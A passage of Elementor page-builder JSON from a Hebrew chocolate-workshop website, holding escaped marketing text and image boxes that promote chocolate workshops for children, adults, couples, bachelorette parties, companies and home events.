\\u05e9\\u05d0\\u05ea\\u05dd \\u05d1\\u05d3\\u05e8\\u05da \\u05db\\u05dc \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05dc\\u05d0\\u05db\\u05d5\\u05dc. \\u05db\\u05de\\u05e2\\u05d8 \\u05db\\u05d5\\u05dc\\u05dd \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05de\\u05ea\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d5\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05e6\\u05e8\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05d5 \\u05e2\\u05dc \\u05d1\\u05e1\\u05d9\\u05e1 \\u05e7\\u05d1\\u05d5\\u05e2. \\u05d1\\u05d9\\u05df \\u05d0\\u05dd \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd, \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd, \\u05d1\\u05e2\\u05d5\\u05d2\\u05d5\\u05ea \\u05d0\\u05d5 \\u05d1\\u05e2\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea, \\u05d1\\u05d2\\u05dc\\u05d9\\u05d3\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d8\\u05e2\\u05d9\\u05de\\u05d4, \\u05d5\\u05d2\\u05dd \\u05d1\\u05d8\\u05d1\\u05dc\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e4\\u05e9\\u05d5\\u05d8\\u05d4 \\u05e9\\u05e7\\u05e0\\u05d9\\u05ea\\u05dd \\u05dc\\u05d0\\u05d7\\u05e8\\u05d5\\u05e0\\u05d4 \\u05d1\\u05e1\\u05d5\\u05e4\\u05e8. \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05e9 \\u05d9\\u05db\\u05d5\\u05dc\\u05ea \\u05dc\\u05d4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d0\\u05ea \\u05de\\u05e6\\u05d1 \\u05d4\\u05e8\\u05d5\\u05d7, \\u05dc\\u05e9\\u05de\\u05d7 \\u05d5\\u05dc\\u05e8\\u05d5\\u05de\\u05dd, \\u05d5\\u05d1\\u05e2\\u05d9\\u05e7\\u05e8 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05dc\\u05e0\\u05d5 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d5\\u05d8\\u05d5\\u05d1 \\u05e2\\u05dc \\u05d4\\u05dc\\u05d1.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"528c897\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f245b9c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1d4f8d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_23615471_s-2019-1.jpg\",\"id\":411},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05db\\u05dc \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05d0\\u05d5 \\u05de\\u05e1\\u05d9\\u05d1\\u05d4. \\u05ea\\u05e2\\u05e1\\u05d5\\u05e7\\u05d4 \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d7\\u05d5\\u05e4\\u05e9, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d0\\u05d5 \\u05e1\\u05ea\\u05dd \\u05d0\\u05d9\\u05d7\\u05d5\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9. \\u05dc\\u05db\\u05dc \\u05de\\u05e7\\u05e8\\u05d4, \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05e9\\u05dc\\u05e2\\u05d5\\u05dc\\u05dd \\u05dc\\u05d0 \\u05ea\\u05d9\\u05e9\\u05db\\u05d7.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-kids\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"59b08ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"661603b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_243662986_s-2019-1.jpg\",\"id\":413},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd\",\"description_text\":\"\\u05db\\u05d9 \\u05d0\\u05d9\\u05df \\u05d2\\u05d9\\u05dc \\u05dc\\u05e9\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d2\\u05dd \\u05dc\\u05e0\\u05d5 \\u05d4\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05de\\u05d5\\u05ea\\u05e8 \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9\\u05ea \\u05d1\\u05d4 \\u05e0\\u05db\\u05d9\\u05df \\u05d3\\u05d1\\u05e8\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd, \\u05e0\\u05d8\\u05e2\\u05dd \\u05d5\\u05e0\\u05dc\\u05de\\u05d3 \\u05e2\\u05dc \\u05d4\\u05d3\\u05d1\\u05e8 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05d4\\u05d6\\u05d4 \\u05e9\\u05e0\\u05e7\\u05e8\\u05d0 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/adult-chocolate-workshop\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4b95460\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c0c0b4f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_62137823_s-2019-1.jpg\",\"id\":414},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"description_text\":\" \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05e0\\u05d5\\u05e2\\u05d3\\u05d4 \\u05dc\\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea \\u05d5\\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea \\u05e9\\u05dc\\u05d0 \\u05d9\\u05e9\\u05db\\u05d7\\u05d5 \\u05dc\\u05e2\\u05d5\\u05dc\\u05dd. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05d2\\u05dd \\u05db\\u05de\\u05ea\\u05e0\\u05d4 \\u05d0\\u05d5 \\u05db\\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d5\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05d4 \\u05d1\\u05db\\u05dc \\u05de\\u05e7\\u05d5\\u05dd \\u05e9\\u05ea\\u05e8\\u05e6\\u05d5.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-couples\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7b7ce5f\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5817cff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7a1d0cb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_53956819_s-2019-1.jpg\",\"id\":416},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"description_text\":\"\\u05d4\\u05d7\\u05d1\\u05e8\\u05d4 \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d4 \\u05de\\u05ea\\u05d7\\u05ea\\u05e0\\u05ea \\u05d5\\u05d0\\u05ea \\u05de\\u05d0\\u05e8\\u05d2\\u05e0\\u05ea \\u05dc\\u05d4 \\u05d0\\u05ea \\u05d4\\u05d0\\u05d8\\u05e8\\u05e7\\u05e6\\u05d9\\u05d4 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05d4. \\u05e0\\u05db\\u05d5\\u05df, \\u05e0\\u05de\\u05d0\\u05e1 \\u05de\\u05db\\u05dc \\u05d4\\u05d4\\u05e4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d4\\u05e0\\u05d3\\u05d5\\u05e9\\u05d5\\u05ea \\u05d5\\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d7\\u05d3\\u05e9. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05e0\\u05d5\\u05e2\\u05d3\\u05d4 \\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea  \\u05dc\\u05d2\\u05d5\\u05d5\\u05df  \\u05d0\\u05ea \\u05d4\\u05d4\\u05e4\\u05e2\\u05dc\\u05d5\\u05ea \\u05d4\\u05e9\\u05d2\\u05e8\\u05ea\\u05d9\\u05d5\\u05ea \\u05d5\\u05de\\u05d1\\u05d8\\u05d9\\u05d7\\u05d4 \\u05d7\\u05d5\\u05d5\\u05d9\\u05d9\\u05d4 \\u05d1\\u05dc\\u05ea\\u05d9 \\u05e0\\u05e9\\u05db\\u05ea \\u05dc\\u05db\\u05dc\\u05d4 \\u05dc\\u05e2\\u05ea\\u05d9\\u05d3 \\u05d5\\u05dc\\u05db\\u05dc \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d5\\u05ea\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/chocolate-workshop-for-bachelorette-party\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"ce1b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"23fa8d2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_247319794_s-2019-1.jpg\",\"id\":418},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d5\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05e2\\u05d3\\u05ea \\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05d9\\u05d5\\u05dd \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05d0\\u05d5 \\u05e2\\u05e8\\u05d1 \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05db\\u05d9\\u05d9\\u05e4\\u05d9 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05de\\u05d2\\u05d1\\u05e9\\u05ea, \\u05de\\u05e8\\u05d2\\u05e9\\u05ea \\u05d5\\u05d1\\u05dc\\u05ea\\u05d9 \\u05e0\\u05e9\\u05db\\u05d7\\u05ea.\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/?page_id=100\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"3a32e3a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a0f0677\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2019\\/12\\/Depositphotos_72660625_s-2019-1.jpg\",\"id\":420},\"title_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05db\\u05dc \\u05d0\\u05dc\\u05d5 \\u05d4\\u05de\\u05d7\\u05e4\\u05e9\\u05d9\\u05dd \\u05dc\\u05d4\\u05e4\\u05d9\\u05e7 \\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05de\\u05d1\\u05dc\\u05d9 \\u05dc\\u05e6\\u05d0\\u05ea \\u05de\\u05d4\\u05d1\\u05d9\\u05ea. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05d4\\u05d1\\u05d9\\u05ea \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea, \\u05e2\\u05e8\\u05d1\\u05d9 \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9, \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df, \\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d5\\u05e2\\u05d5\\u05d3. \\u05d4\\u05e6\\u05d9\\u05d5\\u05d3 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5, \\u05dc\\u05db\\u05dd \\u05e0\\u05e9\\u05d0\\u05e8 \\u05e8\\u05e7 \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/chocolate-workshops\\/home-chocolate-workshop\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"image_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"image_size\":{\"unit\":\"%\",\"size\":55,\"sizes\":[]},\"title_bottom_space\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f4d3ed\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"174e916\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d555ad1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05dc\\u05d3, \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05e2\\u05d5\\u05dc\\u05dd<\\/h2><p>\\u05e8\\u05d1\\u05d9\\u05dd \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dc \\u05d1\\u05e1\\u05d9\\u05e1 \\u05d9\\u05d5\\u05de\\u05d9 \\u05d5\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05de\\u05d4\\u05d8\\u05e2\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05e2\\u05dc \\u05d4\\u05dc\\u05e9\\u05d5\\u05df. \\u05d7\\u05dc\\u05e7 \\u05dc\\u05d0 \\u05e7\\u05d8\\u05df \\u05de\\u05e2\\u05d5\\u05e0\\u05d9\\u05d9\\u05df \\u05d3\\u05d5\\u05d5\\u05e7\\u05d0 \\u05dc\\u05d3\\u05e2\\u05ea \\u05d0\\u05d9\\u05da \\u05dc\\u05e2\\u05d1\\u05d5\\u05d3 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05e0\\u05db\\u05d5\\u05e0\\u05d4 \\u05e2\\u05dd \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d9\\u05d5\\u05e7\\u05e8\\u05ea\\u05d9 \\u05d4\\u05d6\\u05d4, \\u05de\\u05d4 \\u05d4\\u05d3\\u05e8\\u05da \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d4 \\u05dc\\u05e9\\u05dc\\u05d1 \\u05d0\\u05d5\\u05ea\\u05d5 \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd, \\u05d0\\u05d9\\u05da \\u05d4\\u05db\\u05d9 \\u05e0\\u05db\\u05d5\\u05df \\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8 \\u05d0\\u05d5\\u05ea\\u05d5 \\u05d5\\u05dc\\u05d9\\u05e6\\u05d5\\u05e8 \\u05de\\u05de\\u05e0\\u05d5 \\u05d9\\u05e6\\u05d9\\u05e8\\u05d5\\u05ea \\u05d9\\u05e4\\u05d9\\u05e4\\u05d9\\u05d5\\u05ea, \\u05d5\\u05d2\\u05dd \\u05de\\u05d4 \\u05d4\\u05d3\\u05e8\\u05db\\u05d9\\u05dd \\u05d4\\u05db\\u05d9 \\u05d8\\u05d5\\u05d1\\u05d5\\u05ea \\u05dc\\u05d8\\u05e4\\u05dc \\u05d1\\u05d5 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05e9\\u05ea\\u05d5\\u05e6\\u05d9\\u05d0 \\u05de\\u05de\\u05e0\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d0\\u05e8\\u05d5\\u05de\\u05d5\\u05ea \\u05d4\\u05d8\\u05d5\\u05d1\\u05d5\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05e9\\u05d9\\u05ea\\u05e8\\u05de\\u05d5 \\u05dc\\u05d8\\u05e2\\u05dd \\u05d4\\u05db\\u05dc\\u05dc\\u05d9 \\u05e9\\u05dc \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7. <br \\/><span style=\\\"color: #ff0000;\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d9\\u05ea\\u05d9\\u05ea \\u05d4\\u05d9\\u05d0 \\u05d4\\u05d3\\u05e8\\u05da \\u05d4\\u05d8\\u05d5\\u05d1\\u05d4 \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05d6\\u05d0\\u05ea.<\\/span><\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea, \\u05de\\u05d4 \\u05d6\\u05d4 \\u05d0\\u05d5\\u05de\\u05e8?<\\/h2><p>\\u05dc\\u05de\\u05e2\\u05e9\\u05d4 \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea \\u05d5\\u05d8\\u05e2\\u05d9\\u05de\\u05d4 \\u05e9\\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05d0\\u05e6\\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea. <br \\/>\\u05db\\u05dc \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05d5\\u05ea\\u05d0\\u05de\\u05ea \\u05dc\\u05de\\u05d0\\u05d5\\u05e8\\u05e2, \\u05dc\\u05d0\\u05d5\\u05e4\\u05d9 \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d5\\u05dc\\u05db\\u05de\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d1\\u05e1\\u05d3\\u05e0\\u05d4 \\u05e2\\u05e6\\u05de\\u05d4 (\\u05dc\\u05de\\u05e9\\u05dc, \\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05d1\\u05d1\\u05d9\\u05ea \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05d5\\u05e2\\u05d5\\u05d3), \\u05d1\\u05db\\u05dc \\u05e1\\u05d3\\u05e0\\u05d4 \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05db\\u05d9\\u05e6\\u05d3 \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d1\\u05de\\u05e7\\u05e8\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea, \\u05d5\\u05de\\u05d5\\u05e6\\u05e8\\u05d9 \\u05d4\\u05d0\\u05e4\\u05d9\\u05d4 \\u05e9\\u05d9\\u05e9 \\u05d1\\u05db\\u05dc \\u05d0\\u05e8\\u05d5\\u05df, \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05e9\\u05d9\\u05de\\u05d9\\u05dd \\u05d5\\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd. <br \\/><br \\/>\\u05dc\\u05de\\u05e2\\u05e9\\u05d4 \\u05dc\\u05d0 \\u05e6\\u05e8\\u05d9\\u05da \\u05d4\\u05db\\u05e0\\u05d4 \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea, \\u05d5\\u05dc\\u05d0 \\u05ea\\u05d0\\u05dc\\u05e6\\u05d5 \\u05dc\\u05e8\\u05db\\u05d5\\u05e9 \\u05de\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05de\\u05d9\\u05d5\\u05d7\\u05d3. <br \\/>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea \\u05de\\u05d5\\u05ea\\u05d0\\u05de\\u05ea \\u05dc\\u05de\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea, \\u05dc\\u05ea\\u05e0\\u05d5\\u05e8 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d9, \\u05dc\\u05de\\u05d9\\u05e7\\u05e1\\u05e8, \\u05dc\\u05de\\u05d8\\u05e8\\u05e4\\u05d4 \\u05d5\\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05dc\\u05de\\u05e7\\u05e8\\u05e8 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d9, \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05e9\\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e9\\u05d5\\u05d1 \\u05d5\\u05dc\\u05e9\\u05d7\\u05d6\\u05e8 